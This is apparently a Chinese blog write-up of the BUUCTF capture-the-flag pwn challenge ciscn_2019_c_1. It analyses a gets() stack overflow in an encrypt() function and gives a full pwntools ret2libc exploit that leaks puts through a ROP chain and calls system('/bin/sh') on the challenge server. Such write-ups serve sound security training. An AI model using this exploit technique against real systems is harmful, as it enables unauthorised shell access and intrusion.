BUUCTF ciscn_2019_c_1题解

于 2025-04-17 00:01:32 发布
阅读量710 收藏 5
点赞数 20
文章标签: c语言 前端 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duwgv/article/details/147016983
版权

先在虚拟机里用checksec,和file查一下,64位动态链接程序。

只开了一个NX,栈堆随机化,got表随机,大概率是一个栈溢出。

用gdb跑一下,看一下什么流程。

 可以看到有三个选项,1,加密,2,解密,3,退出。

选个1,输入我们要加密文字后,给出加密结果。2,解密只给出一句话没什么用。3,直接退出了。

推测应该有个加密函数,其中会让我们输入内容,栈溢出应该在这个部位。

用IDA看一下。

 可以看到有个加密函数,进去看一下

它开辟了50个栈空间,但是只读了48个字符,这里有漏洞。

可以覆盖返回地址。

然后我们查看字符串,发现没有后门函数

分析一下这个加密算法:

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h] BYREF
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets((__int64)s);//不检查输入的字符长度,可以导致缓冲区溢出
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;//遇到长度为0退出
    if ( s[x] <= '`' || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= '\x0F';
      }
      else
      {
        s[x] ^= '\x0E';                  加密就是在特定范围与特定的数进行异或
      }
    }
    else
    {
      s[x] ^= '\r';
    }
    ++x;
  }
  puts("Ciphertext");//最后puts输出
  return puts(s);返回puts输出值
}

看来我们要构造ROP链了

需要先找出函数的真实地址。利用触发漏洞构造system("/bin/sh")的ROP链

两次攻击,第一次泄露地址,第二次得到shell权限

#!/usr/bin/env python3
from pwn import *
from LibcSearcher import*
context.log_level='debug'  #设置调试模式,输出详细的调试信息。
elf=ELF('./ci')   #加载目标程序的二进制文件,用于获取程序的符号地址。
#io=process('./ci')
io=remote('node5.buuoj.cn',28167)
ret=0x4006b9
pop_rdi_addr=0x400c83
puts_plt=elf.plt["puts"]  #puts 函数的 PLT(Procedure Linkage Table)地址,用于调用动态链接库中的 puts
puts_got=elf.got["puts"]  #puts 函数的 GOT(Global Offset Table)地址,用于存储动态链接库中 puts 的实际地址
main_addr=0x400B28
payload=b'\0'+b'a'*0x57+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendlineafter(b"Input your choice!\n",b'1')
io.sendline(payload)
io.recvuntil("Ciphertext\n")
io.recvuntil("\n")

puts_addr=u64(io.recv(6).ljust(0x08,b"\x00")) #接收 6 字节数据并补齐 8 字节,解析为 64 位地址。
libc=LibcSearcher("puts",puts_addr)  #根据泄露的 puts 地址查找对应的 libc 数据库。
libcbase=puts_addr-libc.dump("puts")  #计算 libc 的基地址,用于后续调用 system/bin/sh
print(libcbase)

io.sendlineafter(b'Input your choice!\n',b'1')
io.recvuntil(b"Input your Plaintext to be encrypted\n")
sys_addr=libcbase+libc.dump('system') #实际地址是基地址加上偏移地址
bin_sh=libcbase+libc.dump('str_bin_sh')
payload1=b'\0'+b"a"*0x57+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(sys_addr)  #把/bin/sh地址加载到rdi再用system函数执行。
io.sendline(payload1)
io.interactive()

duwgv
关注
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 472
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
buuctf:ciscn_s_3题解
xia0ji233
05-27 808
title: 系统调用的学习 date: 2021-05-25 22:00:00 tags: binary security study report syscall comments: true categories: ctf pwn today新的知识又增长了,发现了getshell的另一种方式:syscall和srop。故事还要源于…(此处省略万字输出) (note:本作者这次有点懒,没有写AT&T汇编,而是一律用了intel汇编,请悉知) 可能是之前汇编基础不太好吧,竟没有发现sy.
BUUCTF ciscn_2019_c_1
N1rvana的博客
11-14 4897
一道积攒了很久才解出来的题,这道题大体不难,但是好多小细节呜呜呜。而且Libcsearcher里的libc库没更新(上篇博客讲了)。 这道题是BUUCTF上的ciscn_2019_c_1。标准的64位ROP流程,我也就分享一下自己的坎坷心路历程。 代码审计 老规矩checksec一下,只开了nx保护。 观察main函数 显然哦,只有输入1才有点用。 关键函数:encrypt() 发现一个栈溢出漏洞。ROP链的入口。 然后就是读取s的长度,在长度范围内对内容进行加密:也就是根据ascii码范围不同来进行
buuctf--ciscn_2019_c_1
最新发布
2301_81060697的博客
02-20 670
获取libc库构造rop链
buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 857
通俗易懂
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1433
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
BUUCTFciscn_2019_c_1
2201_75556700的博客
11-30 1256
1、kali分析文件2、运行文件:3、64位ida分析文件,在函数名那里可以看到有三个函数:main,encrypt,begin在main函数中调用了这两个函数,还调用了puts函数,puts函数是libc库中的函数encrypt函数中调用了gets危险函数;gets函数是libc库中的一个函数4、shift+f12查看字符串,这里没有调用system也没有后门,猜测是利用ret2libc。
BUUCTF__web题解合集(十二)
风过江南乱的博客
10-14 976
1、[BSidesCF 2019]Kookie 2、[CISCN2019 华北赛区 Day1 Web5]CyberPunk 3、[RCTF2015]EasySQL 4、[Zer0pts2020]Can you guess it? 5、[HITCON 2017]SSRFme
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1187
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客大挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb、
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 859
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
[BUUCTF]ciscn_2019_c_1
Lucien_Carr的博客
04-08 1583
想办法通过encrypt函数的 get函数栈溢出获得其中一个函数的地址(本题选择puts),通过LibcSearcher得到该函数在对应libc中的偏移量。没有‘system’,‘bin/sh’等有用的字符串,函数列表里也没有system等后门函数。该程序中并没有system,bin/sh等有用的字符串,无法使用ret2text。也没有构造溢出的函数,但是有很多puts,很好后面ret2libc可以用。通过已经调用过的函数泄露它在程序中的地址,然后利用地址末尾的3个字节,在。没什么能构造溢出的函数。
ciscn_2019_c_1BUUCTF
qq_41696518的博客
08-26 1304
ciscn_2019_c_1BUUCTF
BUUCTF-PWN】 ciscn_2019_c_1
qcwwww的博客
05-07 504
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
buuctf pwn ciscn_2019_c_1
qq_58402603的博客
10-20 664
首先基本操作: 先对文件进行checksec和file查看 然后使用ida进行静态分析,找到main函数后按F5观察伪代码 发现是一个加密程序 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击 双击s查看字符串s所分配的内存大小可以发现,一共占50...
buuctf PWN ciscn_2019_c_1
wp568的博客
10-08 303
amd64的参数调用顺序是如下序列的自后而前,即:完成传递参数(地址)->本函数地址 -> 返回地址。encrypt()里面的get()可以溢出,栈大小为50h。puts()可以用来泄露libc基址。
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 8389
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 676
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4942
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
"复变函数题解_2019秋 学生总结"。
复平面上三个相异且不共线的点z1, z2, z3构成一个三角形∆z1z2z3。我们要求出这个三角形的外接圆圆心z0的坐标,并证明当且仅当z0 = z1+z2+z3时,∆z1z2z3为正三角形,并求出外接圆的半径r。 根据外心的定义,外接圆...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值